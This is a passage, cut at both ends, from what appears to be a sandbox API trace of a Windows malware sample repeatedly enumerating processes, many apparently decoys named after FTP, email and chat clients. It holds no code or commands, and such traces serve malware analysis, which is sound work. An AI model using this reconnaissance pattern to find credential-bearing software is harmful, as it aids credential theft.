th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0225.916] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0225.918] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0225.931] CloseHandle (hObject=0x31c) returned 1 [0225.931] Sleep (dwMilliseconds=0x64) [0226.056] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2200 [0226.073] Process32First (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.075] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0226.077] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0226.080] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0226.082] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0226.085] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0226.087] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0226.092] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0226.194] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0226.196] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.198] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.199] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0226.201] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.204] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.205] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.207] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.209] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.211] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.212] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.215] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0226.217] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0226.218] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0226.220] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0226.222] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.223] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0226.225] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0226.227] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0226.228] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0226.230] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0226.273] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0226.275] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.277] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0226.278] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0226.284] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0226.286] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.288] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0226.290] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0226.292] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0226.294] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0226.295] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0226.297] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0226.299] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0226.301] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0226.303] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0226.305] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0226.307] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0226.311] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0226.354] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0226.356] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0226.358] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0226.360] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0226.362] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0226.364] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0226.366] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0226.368] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0226.369] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0226.371] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0226.373] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0226.376] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0226.378] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0226.382] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0226.385] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0226.388] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0226.441] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0226.445] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0226.448] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0226.450] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0226.453] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0226.455] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0226.458] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0226.460] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0226.462] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0226.466] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0226.468] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0226.471] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0226.474] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0226.477] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0226.484] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0226.486] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0226.488] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0226.491] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0226.492] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, 